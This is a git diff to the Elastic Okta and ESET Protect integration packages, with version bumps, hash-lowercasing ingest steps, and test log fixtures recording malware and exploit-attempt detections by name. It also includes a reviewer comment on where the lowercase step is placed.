Directory) with Elastic Agent." type: integration categories: @@ -10,7 +10,7 @@ categories: - security conditions: kibana: - version: "^8.11.0" + version: "^8.12.0" elastic: subscription: "basic" icons: diff --git a/packages/entityanalytics_okta/changelog.yml b/packages/entityanalytics_okta/changelog.yml index a231aaf7d37..ccb00e5a8b7 100644 
--- a/packages/entityanalytics_okta/changelog.yml +++ b/packages/entityanalytics_okta/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.1.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 - version: "1.0.1" changes: - description: Changed owners diff --git a/packages/entityanalytics_okta/data_stream/user/manifest.yml b/packages/entityanalytics_okta/data_stream/user/manifest.yml index 213cb15c458..e57abfa0c76 100644 --- a/packages/entityanalytics_okta/data_stream/user/manifest.yml +++ b/packages/entityanalytics_okta/data_stream/user/manifest.yml @@ -20,6 +20,7 @@ streams: required: true show_user: true description: The Okta API token, used for authentication. + secret: true - name: dataset type: select title: Okta Dataset diff --git a/packages/entityanalytics_okta/manifest.yml b/packages/entityanalytics_okta/manifest.yml index 1e499f6bada..d6f3b28bd8c 100644 --- a/packages/entityanalytics_okta/manifest.yml +++ b/packages/entityanalytics_okta/manifest.yml @@ -1,14 +1,14 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: entityanalytics_okta title: Okta Entity Analytics -version: "1.0.1" +version: "1.1.0" description: "Collect User Identities from Okta with Elastic Agent." type: integration categories: - security conditions: kibana: - version: "^8.9.0" + version: "^8.12.0" elastic: subscription: "basic" screenshots: diff --git a/packages/eset_protect/changelog.yml b/packages/eset_protect/changelog.yml index 78cdaa8731e..66eb2d62b91 100644 --- a/packages/eset_protect/changelog.yml +++ b/packages/eset_protect/changelog.yml 
@@ -1,4 +1,19 @@ # newer versions go on top +- version: "0.4.0" + changes: + - description: Lowercase related hash and indicator hash to support indicator rule matching. Fixed grok parse error when object_uri equals 'script'. + type: enhancement + link: https://github.com/elastic/integrations/pull/9465 +- version: "0.3.0" + changes: + - description: Fix host and file ECS fields. + type: enhancement + link: https://github.com/elastic/integrations/pull/9382 +- version: "0.2.0" + changes: + - description: Set sensitive values as secret, upgrade to package spec 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9238 - version: "0.1.1" changes: - description: Changed owners diff --git a/packages/eset_protect/data_stream/detection/_dev/test/pipeline/test-detection.log b/packages/eset_protect/data_stream/detection/_dev/test/pipeline/test-detection.log index bd49f88efc9..daf2e75140e 100644 --- a/packages/eset_protect/data_stream/detection/_dev/test/pipeline/test-detection.log +++ b/packages/eset_protect/data_stream/detection/_dev/test/pipeline/test-detection.log 
@@ -4,4 +4,5 @@ {"category":"DETECTION_CATEGORY_VULNERABILITY","objectUrl":"C:\\Temp\\06516f11-xxxx-xxxx-xxxx-37da66b5de99_ccf7464ba6e2e12e984514f694bfb10d03de77358d8a3afd7a2ffed150ec1df8.zip.e99\\ccf7464ba6e2e12e984514f694bfb10d03de77358d8a3afd7a2ffed150ec1df8","uuid":"xxx-xxxx-0987-1234-xxxxxxxxxxxx","severityLevel":"SEVERITY_LEVEL_HIGH","responses":[{}],"occurTime":"2023-10-28T10:36:53Z","objectTypeName":"Memory","objectHashSha1":"AAF4C61DDCC5E8A2DABEDE0F3B4820123456780D","networkCommunication":{"protocolName":"0","remoteIpAddress":"67.43.156.0","remotePort":443,"localIpAddress":"216.160.83.56","localPort":80,"direction":"NETWORK_COMMUNICATION_DIRECTION_OUTBOUND"},"context":{"process":{"path":"C:\\Windows\\exampletest.exe"},"deviceUuid":"xxx-0985-1234-1234-xxxxxxxxxxxx","userName":"Administrator","circumstances":"Win32/Injector.DTLK"}} {"category":"DETECTION_CATEGORY_UNSPECIFIED","typeName":"Test file","objectUrl":"C:\\Temp\\06516f11-xxxx-xxxx-xxxx-37da66b5de99_ccf7464ba6e2e12e984514f694bfb10d03de77358d8a3afd7a2ffed150ec1df8.zip.e99\\ccf7464ba6e2e12e984514f694bfb10d03de77358d8a3afd7a2ffed150ec1df8","uuid":"xxx-xxxx-9789-1234-xxxxxxxxxxxx","severityLevel":"SEVERITY_LEVEL_UNSPECIFIED","responses":[{}],"occurTime":"2023-07-28T10:36:53Z","objectTypeName":"Memory","objectHashSha1":"AAF4C61DDCC5E8A2DABEDE0F3B4820123456780D","networkCommunication":{"protocolName":"0","remoteIpAddress":"175.16.199.1","remotePort":8080,"localIpAddress":"216.160.83.56","localPort":80,"direction":"NETWORK_COMMUNICATION_DIRECTION_OUTBOUND"},"context":{"process":{"path":"C:\\exampletest.exe"},"deviceUuid":"xxx-1234-1234-1234-xxxxxxxxxxxx","userName":"example\\exmpleuser","circumstances":"Win32/Injector.DTLK"}} {"category":"DETECTION_CATEGORY_HIPS_RULE","typeName":"Potentially unwanted 
application","objectUrl":"C:\\Temp\\06516f11-xxxx-xxxx-xxxx-37da66b5de99_ccf7464ba6e2e12e984514f694bfb10d03de77358d8a3afd7a2ffed150ec1df8.zip.e99\\ccf7464ba6e2e12e984514f694bfb10d03de77358d8a3afd7a2ffed150ec1df8","uuid":"xxx-1234-9789-1234-xxxxxxxxxxxx","severityLevel":"SEVERITY_LEVEL_DIAGNOSTIC","responses":[{}],"occurTime":"2023-07-15T10:36:53Z","objectTypeName":"Memory","objectHashSha1":"AAF4C61DDCC5E8A2DABEDE0F3B4820123456780D","networkCommunication":{"protocolName":"http","remoteIpAddress":"1.128.0.0","remotePort":56,"localIpAddress":"1.128.0.5","localPort":8080,"direction":"NETWORK_COMMUNICATION_DIRECTION_UNSPECIFIED"},"context":{"process":{"path":"C:\\exampletest.exe"},"deviceUuid":"xxx-1234-2345-1234-xxxxxxxxxxxx","userName":"example","circumstances":"Blocked by Administrator"}} +{"category":"DETECTION_CATEGORY_UNSPECIFIED","context":{"circumstances":"Malware: VBS/TrojanDownloader.Agent.YUI","deviceUuid":"16b429cb-c064-4a31-98ba-62fff54f0c96","process":{"path":"%SYSTEM%\\windowspowershell\\v1.0\\powershell.exe"},"userName":"kate-ebademo\\kate"},"displayName":"","networkCommunication":{"direction":"NETWORK_COMMUNICATION_DIRECTION_UNSPECIFIED","localIpAddress":"","localPort":0,"protocolName":"0","remoteIpAddress":"","remotePort":0},"objectHashSha1":"22B9B35A804A7A3739CBD007E00959075AECF0FC","objectName":"","objectTypeName":"File","objectUrl":"script","occurTime":"2024-03-27T09:54:20Z","responses":[{"description":"","deviceRestartRequired":false,"displayName":"","protectionName":""}],"severityLevel":"SEVERITY_LEVEL_LOW","typeName":"nil","uuid":"ae4d218f-5806-e446-0b86-609e5a4cfa94"} {"message":"retry"} diff --git a/packages/eset_protect/data_stream/detection/_dev/test/pipeline/test-detection.log-expected.json b/packages/eset_protect/data_stream/detection/_dev/test/pipeline/test-detection.log-expected.json index fa79456f0e1..413e212abb5 100644 --- a/packages/eset_protect/data_stream/detection/_dev/test/pipeline/test-detection.log-expected.json 
+++ b/packages/eset_protect/data_stream/detection/_dev/test/pipeline/test-detection.log-expected.json @@ -65,7 +65,7 @@ }, "file": { "hash": { - "sha1": "AAF4C61DDCC5E8A2DABEDE0F3B482CD9AEA9434D" + "sha1": "aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d" } }, "host": { @@ -83,7 +83,7 @@ }, "related": { "hash": [ - "AAF4C61DDCC5E8A2DABEDE0F3B482CD9AEA9434D" + "aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d" ], "hosts": [ "xxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx" @@ -180,7 +180,7 @@ }, "file": { "hash": { - "sha1": "AAF4C61DDCC5E8A2DABEDE0F3B4820123456789D" + "sha1": "aaf4c61ddcc5e8a2dabede0f3b4820123456789d" } }, "host": { @@ -198,7 +198,7 @@ }, "related": { "hash": [ - "AAF4C61DDCC5E8A2DABEDE0F3B4820123456789D" + "aaf4c61ddcc5e8a2dabede0f3b4820123456789d" ], "hosts": [ "xxx-xxxx-1234-5678-xxxxxxxxxxxx" @@ -294,7 +294,7 @@ }, "file": { "hash": { - "sha1": "AAF4C61DDCC5E8A2DABEDE0F3B4820123456780D" + "sha1": "aaf4c61ddcc5e8a2dabede0f3b4820123456780d" } }, "host": { @@ -315,7 +315,7 @@ }, "related": { "hash": [ - "AAF4C61DDCC5E8A2DABEDE0F3B4820123456780D" + "aaf4c61ddcc5e8a2dabede0f3b4820123456780d" ], "hosts": [ "xxx-xxxx-1234-1234-xxxxxxxxxxxx" @@ -449,7 +449,7 @@ }, "related": { "hash": [ - "AAF4C61DDCC5E8A2DABEDE0F3B4820123456780D" + "aaf4c61ddcc5e8a2dabede0f3b4820123456780d" ], "hosts": [ "xxx-0985-1234-1234-xxxxxxxxxxxx" @@ -570,7 +570,7 @@ }, "related": { "hash": [ - "AAF4C61DDCC5E8A2DABEDE0F3B4820123456780D" + "aaf4c61ddcc5e8a2dabede0f3b4820123456780d" ], "hosts": [ "xxx-1234-1234-1234-xxxxxxxxxxxx" @@ -696,7 +696,7 @@ }, "related": { "hash": [ - "AAF4C61DDCC5E8A2DABEDE0F3B4820123456780D" + "aaf4c61ddcc5e8a2dabede0f3b4820123456780d" ], "hosts": [ "xxx-1234-2345-1234-xxxxxxxxxxxx" 
@@ -737,6 +737,107 @@ "name": "example" } }, + { + "@timestamp": "2024-03-27T09:54:20.000Z", + "destination": { + "port": 0 + }, + "ecs": { + "version": "8.11.0" + }, + "eset_protect": { + "detection": { + "category": "DETECTION_CATEGORY_UNSPECIFIED", + "context": { + "circumstances": "Malware: VBS/TrojanDownloader.Agent.YUI", + "device_uuid": "16b429cb-c064-4a31-98ba-62fff54f0c96", + "process": { + "path": "%SYSTEM%\\windowspowershell\\v1.0\\powershell.exe" + }, + "user_name": "kate-ebademo\\kate" + }, + "network_communication": { + "direction": "NETWORK_COMMUNICATION_DIRECTION_UNSPECIFIED", + "local": { + "port": 0 + }, + "protocol_name": "0", + "remote": { + "port": 0 + } + }, + "object_hash_sha1": "22B9B35A804A7A3739CBD007E00959075AECF0FC", + "object_type_name": "File", + "object_url": "script", + "occur_time": "2024-03-27T09:54:20.000Z", + "responses": [ + { + "device_restart_required": false + } + ], + "severity_level": "SEVERITY_LEVEL_LOW", + "type_name": "nil", + "uuid": "ae4d218f-5806-e446-0b86-609e5a4cfa94" + } + }, + "event": { + "kind": "alert", + "original": "{\"category\":\"DETECTION_CATEGORY_UNSPECIFIED\",\"context\":{\"circumstances\":\"Malware: 
VBS/TrojanDownloader.Agent.YUI\",\"deviceUuid\":\"16b429cb-c064-4a31-98ba-62fff54f0c96\",\"process\":{\"path\":\"%SYSTEM%\\\\windowspowershell\\\\v1.0\\\\powershell.exe\"},\"userName\":\"kate-ebademo\\\\kate\"},\"displayName\":\"\",\"networkCommunication\":{\"direction\":\"NETWORK_COMMUNICATION_DIRECTION_UNSPECIFIED\",\"localIpAddress\":\"\",\"localPort\":0,\"protocolName\":\"0\",\"remoteIpAddress\":\"\",\"remotePort\":0},\"objectHashSha1\":\"22B9B35A804A7A3739CBD007E00959075AECF0FC\",\"objectName\":\"\",\"objectTypeName\":\"File\",\"objectUrl\":\"script\",\"occurTime\":\"2024-03-27T09:54:20Z\",\"responses\":[{\"description\":\"\",\"deviceRestartRequired\":false,\"displayName\":\"\",\"protectionName\":\"\"}],\"severityLevel\":\"SEVERITY_LEVEL_LOW\",\"typeName\":\"nil\",\"uuid\":\"ae4d218f-5806-e446-0b86-609e5a4cfa94\"}", + "type": [ + "info" + ] + }, + "file": { + "hash": { + "sha1": "22b9b35a804a7a3739cbd007e00959075aecf0fc" + } + }, + "host": { + "id": "16b429cb-c064-4a31-98ba-62fff54f0c96" + }, + "message": "Malware: VBS/TrojanDownloader.Agent.YUI", + "observer": { + "product": "ESET PROTECT", + "type": "ids", + "vendor": "ESET" + }, + "process": { + "executable": "%SYSTEM%\\windowspowershell\\v1.0\\powershell.exe", + "name": "powershell.exe" + }, + "related": { + "hash": [ + "22b9b35a804a7a3739cbd007e00959075aecf0fc" + ], + "hosts": [ + "16b429cb-c064-4a31-98ba-62fff54f0c96" + ], + "user": [ + "kate" + ] + }, + "rule": { + "category": "DETECTION_CATEGORY_UNSPECIFIED" + }, + "source": { + "port": 0 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "technique": { + "name": [ + "nil" + ] + } + }, + "user": { + "domain": "kate-ebademo", + "name": "kate" + } + }, null ] } \ No newline at end of file 
diff --git a/packages/eset_protect/data_stream/detection/elasticsearch/ingest_pipeline/default.yml b/packages/eset_protect/data_stream/detection/elasticsearch/ingest_pipeline/default.yml
index cbd0fd76d87..a88bb06c12e 100644
--- a/packages/eset_protect/data_stream/detection/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/eset_protect/data_stream/detection/elasticsearch/ingest_pipeline/default.yml
@@ -331,12 +331,20 @@ processors:
 copy_from: eset_protect.detection.object_hash_sha1
 ignore_empty_value: true
 if: ctx.eset_protect?.detection?.object_type_name == "File"
+ - lowercase:
+ field: file.hash.sha1
+ tag: lowercase_file_hash_sha1
+ ignore_missing: true
 - append:
 field: related.hash
 tag: append_object_hash_sha1_into_related_hash
 value: "{{{eset_protect.detection.object_hash_sha1}}}"
 allow_duplicates: false
 if: ctx.eset_protect?.detection?.object_hash_sha1 != null
+ - lowercase:
+ field: related.hash
+ tag: lowercase_related_hash
+ ignore_missing: true
 - rename:
 field: json.objectName
 tag: rename_objectName
diff --git a/packages/eset_protect/data_stream/detection/sample_event.json b/packages/eset_protect/data_stream/detection/sample_event.json
index be272329d06..20db63b13a6 100644
--- a/packages/eset_protect/data_stream/detection/sample_event.json
+++ b/packages/eset_protect/data_stream/detection/sample_event.json
@@ -1,8 +1,8 @@
 {
 "@timestamp": "2023-10-26T13:36:53.000Z",
 "agent": {
- "ephemeral_id": "eaf0a213-9722-4532-9223-51619c3f6c91",
- "id": "7e7335eb-8b8a-400b-9634-4d8caf719b70",
+ "ephemeral_id": "96cc7ee0-ede2-46a4-9b0e-4104dead04cc",
+ "id": "78166295-0693-4726-a27f-cd8722896c22",
 "name": "docker-fleet-agent",
 "type": "filebeat",
 "version": "8.12.0"
@@ -38,8 +38,8 @@
 "version": "8.11.0"
 },
 "elastic_agent": {
- "id": "7e7335eb-8b8a-400b-9634-4d8caf719b70",
- "snapshot": true,
+ "id": "78166295-0693-4726-a27f-cd8722896c22",
+ "snapshot": false,
 "version": "8.12.0"
 },
 "eset_protect": {
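Review bot: The new `lowercase` step on `related.hash` runs immediately after this one append, so it only normalizes what has been appended up to that point; if any later processor in this pipeline (the processors list continues outside the hunk) also appends to `related.hash`, those entries keep their original case and the field is no longer uniformly lowercase, which is the property indicator-match rules rely on. The `allow_duplicates: false` check on the append above also compares the still-uppercase `object_hash_sha1` against existing entries, so a lowercase copy already present would not be recognized as a duplicate. If the goal is a consistently lowercase `related.hash`, move the `lowercase_related_hash` processor to the end of the processors list after the last append, and keep the `file.hash.sha1` step where it is. A one-line why-comment above the step would help the next maintainer keep that ordering, e.g. `# related.hash is lowercased so indicator-match rules compare hashes case-consistently`.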
@@ -75,7 +75,7 @@ "intrusion_detection" ], "dataset": "eset_protect.detection", - "ingested": "2024-01-04T10:08:34Z", + "ingested": "2024-03-18T21:48:09Z", "kind": "alert", "original": "{\"category\":\"DETECTION_CATEGORY_NETWORK_INTRUSION\",\"context\":{\"circumstances\":\"Eicar\",\"deviceUuid\":\"xxx-xxxx-1234-5678-xxxxxxxxxxxx\",\"process\":{\"path\":\"C:\\\\Windows\\\\chrome.exe\"},\"userName\":\"testingpc\\\\example\"},\"networkCommunication\":{\"protocolName\":\"0\",\"remoteIpAddress\":\"89.160.20.112\",\"remotePort\":443},\"objectHashSha1\":\"AAF4C61DDCC5E8A2DABEDE0F3B4820123456789D\",\"objectTypeName\":\"File\",\"objectUrl\":\"C:\\\\Temp\\\\06516f11-xxxx-xxxx-xxxx-37da66b5de99_ccf7464ba6e2e12e984514f694bfb10d03de77358d8a3afd7a2ffed150ec1df8.zip.e99\\\\ccf7464ba6e2e12e984514f694bfb10d03de77358d8a3afd7a2ffed150ec1df8\",\"occurTime\":\"2023-10-26T13:36:53Z\",\"responses\":[{}],\"severityLevel\":\"SEVERITY_LEVEL_MEDIUM\",\"typeName\":\"TCP Port scanning attack\",\"uuid\":\"xxx-xxxx-xxxx-1234-xxxxxxxxxxxx\"}", "type": [ @@ -84,7 +84,7 @@ }, "file": { "hash": { - "sha1": "AAF4C61DDCC5E8A2DABEDE0F3B4820123456789D" + "sha1": "aaf4c61ddcc5e8a2dabede0f3b4820123456789d" } }, "host": { @@ -105,7 +105,7 @@ }, "related": { "hash": [ - "AAF4C61DDCC5E8A2DABEDE0F3B4820123456789D" + "aaf4c61ddcc5e8a2dabede0f3b4820123456789d" ], "hosts": [ "xxx-xxxx-1234-5678-xxxxxxxxxxxx" diff --git a/packages/eset_protect/data_stream/device_task/sample_event.json b/packages/eset_protect/data_stream/device_task/sample_event.json index dd4cca3a0c5..5e87d6dc646 100644 --- a/packages/eset_protect/data_stream/device_task/sample_event.json +++ b/packages/eset_protect/data_stream/device_task/sample_event.json 
@@ -1,11 +1,11 @@ { - "@timestamp": "2024-01-04T10:09:14.915Z", + "@timestamp": "2024-03-27T16:00:29.582Z", "agent": { - "ephemeral_id": "3873a5a6-ab80-4d05-b35a-e91aa4c7f86e", - "id": "7e7335eb-8b8a-400b-9634-4d8caf719b70", + "ephemeral_id": "c5a8ca66-614e-438e-b69a-9e12cb12aa7d", + "id": "e270d8a1-0a98-417c-a79f-840c446ad79a", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.12.0" + "version": "8.12.2" }, "data_stream": { "dataset": "eset_protect.device_task", @@ -16,9 +16,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "7e7335eb-8b8a-400b-9634-4d8caf719b70", - "snapshot": true, - "version": "8.12.0" + "id": "e270d8a1-0a98-417c-a79f-840c446ad79a", + "snapshot": false, + "version": "8.12.2" }, "eset_protect": { "device_task": { @@ -58,7 +58,7 @@ "action": "Shutdown computer", "agent_id_status": "verified", "dataset": "eset_protect.device_task", - "ingested": "2024-01-04T10:09:26Z", + "ingested": "2024-03-27T16:00:39Z", "kind": "event", "original": "{\"action\":{\"name\":\"Shutdown computer\",\"params\":{\"@type\":\"type.googleapis.com/Era.Common.DataDefinition.Task.ESS.OnDemandScan\",\"cleaningEnabled\":true,\"customProfileName\":\"DefaultProfile\",\"scanProfile\":\"InDepth\",\"scanTargets\":[\"eset://AllTargets\"]}},\"description\":\"Automatically created via context menu\",\"displayName\":\"Reboot Computer - via context menu\",\"targets\":{\"devicesUuids\":[\"0205321e-XXXX-XXXX-1234-feeb35010ea7\",\"0205321e-XXXX-XXXX-5678-feeb35010ea7\",\"0205321e-XXXX-1234-5678-feeb35010ea7\"]},\"triggers\":[{\"manual\":{\"expireTime\":\"2023-12-01T01:30:00Z\"}}],\"uuid\":\"c93070e0-XXXX-1234-5678-c48f0e5e0b7e\",\"versionId\":\"1511\"}", "type": [ diff --git a/packages/eset_protect/data_stream/event/_dev/test/pipeline/test-event.log b/packages/eset_protect/data_stream/event/_dev/test/pipeline/test-event.log index aee5f471d23..68ed05019f7 100644 --- a/packages/eset_protect/data_stream/event/_dev/test/pipeline/test-event.log 
+++ b/packages/eset_protect/data_stream/event/_dev/test/pipeline/test-event.log 
@@ -8,3 +8,17 @@ {"event_type":"Threat_Event","ipv4":"192.168.30.31","hostname":"031-mg","group_name":"All/Lost & found","os_name":"Microsoft Windows 10 Pro","group_description":"Lost & found static group","source_uuid":"xxx-xxxx-1234-xxxx-xxxxxxxxxxxx","occured":"25-Jun-2021 09:47:30","severity":"High","threat_type":"Malware","threat_name":"Trojan.Generic","scanner_id":"Real-time file system protection","scan_id":"file123.exe","engine_version":"23500 (20210622)","object_type":"File","object_uri":"file:///C:/Users/Administrator/Downloads/malicious.exe","action_taken":"Quarantined","threat_handled":true,"need_restart":false,"username":"031-MG\\Administrator","processname":"C:\\Program Files\\MalwareScanner\\Scanner.exe","circumstances":"Event occurred on a downloaded file.","firstseen":"21-Jun-2021 09:47:29","hash":"8F765A7D2B0E4D11BC0E79313A8F8E0019F317D9"} {"event_type":"FirewallAggregated_Event","ipv4":"192.168.30.31","hostname":"firewall-test","group_name":"All/Lost & found","os_name":"Microsoft Windows 10 Pro","group_description":"Lost & found static group","source_uuid":"xxx-xxxx-1234-xxxx-xxxxxxxxxxxx","occured":"28-Jun-2023 15:25:12","severity":"High","event":"Denial of Service Attack","source_address":"192.168.30.32","source_address_type":"IPv4","source_port":54321,"target_address":"192.168.30.31","target_address_type":"IPv4","target_port":80,"protocol":"TCP","account":"NT AUTHORITY\\SYSTEM","process_name":"C:\\Windows\\System32\\svchost.exe","inbound":true,"threat_name":"DoS.Generic","aggregate_count":5} {"event_type":"FirewallAggregated_Event","ipv4":"192.168.30.31","hostname":"firewall-test","group_name":"All/Lost & found","os_name":"Microsoft Windows 10 Pro","group_description":"Lost & found static group","source_uuid":"xxx-xxxx-1234-1234-xxxxxxxxxxxx","occured":"24-Apr-2023 15:25:12","severity":"High","event":"Denial of Service 
Attack","source_address":"2a02:cf40::","source_address_type":"IPv6","source_port":8080,"target_address":"1.128.0.5","target_address_type":"IPv4","target_port":80,"protocol":"TCP","account":"NT AUTHORITY\\SYSTEM","process_name":"C:\\Windows\\System32\\svchost.exe","inbound":true,"threat_name":"DoS.Generic","aggregate_count":5} +{"event_type":"FirewallAggregated_Event","ipv4":"1.128.0.5","hostname":"machine1.domain.com","source_uuid":"ca28cf94-2696-44e6-bb0a-1325b09c562f","occured":"15-Mar-2024 18:49:08","severity":"Fatal","event":"Suspected botnet detected","source_address":"192.168.101.2","source_address_type":"IPv4","source_port":53884,"target_address":"1.128.0.5","target_address_type":"IPv4","target_port":443,"protocol":"TCP","process_name":"System","inbound":true,"threat_name":"EK-Mozi","aggregate_count":1} +{"event_type":"FirewallAggregated_Event","ipv4":"192.168.30.31","hostname":"machine2.domain.com","source_uuid":"ff802ef4-bfd6-4fe7-bbfb-215b6beed399","occured":"14-Mar-2024 10:47:28","severity":"Warning","event":"Security vulnerability exploitation attempt","source_address":"192.168.9.254","source_address_type":"IPv4","source_port":59840,"target_address":"1.128.0.5","target_address_type":"IPv4","target_port":80,"protocol":"TCP","process_name":"System","inbound":true,"threat_name":"CVE-2017-5638.Struts2","aggregate_count":1} +{"event_type":"FirewallAggregated_Event","ipv4":"192.168.30.31","hostname":"machine2.domain.com","source_uuid":"ff802ef4-bfd6-4fe7-bbfb-215b6beed399","occured":"14-Mar-2024 10:36:47","severity":"Warning","event":"Security vulnerability exploitation attempt","source_address":"192.168.9.254","source_address_type":"IPv4","source_port":57313,"target_address":"1.128.0.5","target_address_type":"IPv4","target_port":8090,"protocol":"TCP","account":"NT AUTHORITY\\LOCAL SERVICE","process_name":"C:\\Program Files (x86)\\Schneider Electric\\Floating License Manager\\FLEXnet Publisher License Server 
Manager\\lmadmin.exe","inbound":true,"threat_name":"HTTP/Exploit.CVE-2021-41773","aggregate_count":1} +{"event_type":"FirewallAggregated_Event","ipv4":"192.168.30.31","hostname":"machine3.domain.com","source_uuid":"8452d051-47ba-4203-97f5-258899a4161b","occured":"14-Mar-2024 10:31:03","severity":"Warning","event":"Security vulnerability exploitation attempt","source_address":"192.168.9.254","source_address_type":"IPv4","source_port":56800,"target_address":"1.128.0.5","target_address_type":"IPv4","target_port":47001,"protocol":"TCP","process_name":"System","inbound":true,"threat_name":"CVE-2017-5638.Struts2","aggregate_count":1} +{"event_type":"FirewallAggregated_Event","ipv4":"192.168.30.31","hostname":"machine3.domain.com","source_uuid":"8452d051-47ba-4203-97f5-258899a4161b","occured":"14-Mar-2024 10:20:29","severity":"Warning","event":"Security vulnerability exploitation attempt","source_address":"192.168.9.254","source_address_type":"IPv4","source_port":55682,"target_address":"1.128.0.5","target_address_type":"IPv4","target_port":3128,"protocol":"TCP","account":"NT AUTHORITY\\SYSTEM","process_name":"C:\\Program Files\\Apache HTTP Proxy\\bin\\httpd.exe","inbound":true,"threat_name":"HTTP/Exploit.CVE-2021-41773","aggregate_count":1} +{"event_type":"FirewallAggregated_Event","ipv4":"192.168.30.31","hostname":"machine2.domain.com","source_uuid":"ff802ef4-bfd6-4fe7-bbfb-215b6beed399","occured":"14-Mar-2024 10:08:15","severity":"Warning","event":"Security vulnerability exploitation attempt","source_address":"192.168.9.254","source_address_type":"IPv4","source_port":51937,"target_address":"1.128.0.5","target_address_type":"IPv4","target_port":445,"protocol":"TCP","process_name":"System","inbound":true,"threat_name":"SMB.CVE-2011-1267","aggregate_count":1} +{"event_type":"FirewallAggregated_Event","ipv4":"192.168.30.31","hostname":"machine4","source_uuid":"c01a310d-b1a8-4bc6-aa2c-5359e5ecee4e","occured":"14-Mar-2024 10:00:42","severity":"Warning","event":"Security 
vulnerability exploitation attempt","source_address":"192.168.9.254","source_address_type":"IPv4","source_port":64616,"target_address":"1.128.0.5","target_address_type":"IPv4","target_port":47001,"protocol":"TCP","process_name":"System","inbound":true,"threat_name":"CVE-2017-5638.Struts2","aggregate_count":1} +{"event_type":"FirewallAggregated_Event","ipv4":"192.168.30.31","hostname":"machine3.domain.com","source_uuid":"8452d051-47ba-4203-97f5-258899a4161b","occured":"14-Mar-2024 09:52:36","severity":"Warning","event":"Security vulnerability exploitation attempt","source_address":"192.168.9.254","source_address_type":"IPv4","source_port":59912,"target_address":"1.128.0.5","target_address_type":"IPv4","target_port":445,"protocol":"TCP","process_name":"System","inbound":true,"threat_name":"SMB.CVE-2011-1267","aggregate_count":1} +{"event_type":"FirewallAggregated_Event","ipv4":"192.168.30.31","hostname":"machine2.domain.com","source_uuid":"ff802ef4-bfd6-4fe7-bbfb-215b6beed399","occured":"14-Mar-2024 09:11:13","severity":"Warning","event":"Security vulnerability exploitation attempt","source_address":"192.168.9.254","source_address_type":"IPv4","target_address":"1.128.0.5","target_address_type":"IPv4","target_port":8090,"protocol":"TCP","account":"NT AUTHORITY\\LOCAL SERVICE","process_name":"C:\\Program Files (x86)\\Schneider Electric\\Floating License Manager\\FLEXnet Publisher License Server Manager\\lmadmin.exe","inbound":true,"threat_name":"JAVA/Exploit.CVE-2021-44228","aggregate_count":4} +{"event_type":"FirewallAggregated_Event","ipv4":"192.168.30.31","hostname":"machine3.domain.com","source_uuid":"8452d051-47ba-4203-97f5-258899a4161b","occured":"14-Mar-2024 09:34:21","severity":"Warning","event":"Security vulnerability exploitation 
attempt","source_address":"192.168.9.254","source_address_type":"IPv4","source_port":50505,"target_address":"1.128.0.5","target_address_type":"IPv4","target_port":445,"protocol":"TCP","process_name":"System","inbound":true,"threat_name":"SMB/Exploit.DoublePulsar.B","aggregate_count":1} +{"event_type":"FirewallAggregated_Event","ipv4":"192.168.30.31","hostname":"machine2.domain.com","source_uuid":"ff802ef4-bfd6-4fe7-bbfb-215b6beed399","occured":"14-Mar-2024 09:15:30","severity":"Warning","event":"Security vulnerability exploitation attempt","source_address":"192.168.9.254","source_address_type":"IPv4","target_address":"1.128.0.5","target_address_type":"IPv4","target_port":8813,"protocol":"TCP","account":"NT AUTHORITY\\SYSTEM","process_name":"D:\\sw\\Environmental Manager\\EnvironmentalManagerService.exe","inbound":true,"threat_name":"JAVA/Exploit.CVE-2021-44228","aggregate_count":2} +{"event_type":"FirewallAggregated_Event","ipv4":"1.128.0.5","hostname":"machine4","source_uuid":"c539dbdf-2063-477b-81d7-8081a6f7a080","occured":"12-Mar-2024 11:00:26","severity":"Fatal","event":"Web threat","source_address":"192.168.30.32","source_address_type":"IPv4","source_port":37966,"target_address":"1.128.0.5","target_address_type":"IPv4","target_port":49677,"protocol":"TCP","account":"NT AUTHORITY\\SYSTEM","process_name":"C:\\Windows\\System32\\lsass.exe","inbound":true,"threat_name":"RPC/Exploit.CVE-2020-1472","aggregate_count":1} +{"event_type":"Threat_Event","ipv4":"192.168.30.31","hostname":"machine5","source_uuid":"f193d96b-cbd8-4402-94fc-6993efc30b11","occured":"11-Mar-2024 05:56:58","severity":"Warning","threat_type":"Trojan","threat_name":"LNK/Agent.BZ","scanner_id":"Real-time file system protection","scan_id":"virlog.dat","engine_version":"28873 (20240310)","object_type":"File","object_uri":"file:///E:/Removable Drive (1GB).lnk","action_taken":"Cleaned by 
deleting","threat_handled":true,"need_restart":false,"username":"machine5\\Administrator","processname":"C:\\Windows\\explorer.exe","circumstances":"Event occurred during an attempt to access the file.","firstseen":"28-Jul-2021 07:20:55","hash":"1A45EBA0F9EF909E6F3C87B0D5CEDAD27BDB6CF2"} +{"event_type":"Threat_Event","ipv4":"192.168.112.128","ipv6":"","hostname":"kate-ebademo","source_uuid":"16b429cb-c064-4a31-98ba-62fff54f0c96","os_name":"Microsoft Windows 11 Pro","occured":"27-Mar-2024 09:54:20","group_name":"All","group_description":"","severity":"Warning","threat_type":"Trojan","threat_name":"VBS\/TrojanDownloader.Agent.YUI","threat_flags":"","scanner_id":"Script scanner","scan_id":"virlog.dat","engine_version":"28962 (20240327)","object_type":"File","object_uri":"script","action_taken":"Blocked","action_error":"","threat_handled":"true","need_restart":"false","username":"KATE-EBADEMO\\Kate","processname":"PowerShell_C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe_10.0.22621.1","circumstances":"","firstseen":"","hash":"22B9B35A804A7A3739CBD007E00959075AECF0FC"} diff --git a/packages/eset_protect/data_stream/event/_dev/test/pipeline/test-event.log-expected.json b/packages/eset_protect/data_stream/event/_dev/test/pipeline/test-event.log-expected.json index a2df25a3dad..eeddfd561a1 100644 --- a/packages/eset_protect/data_stream/event/_dev/test/pipeline/test-event.log-expected.json +++ 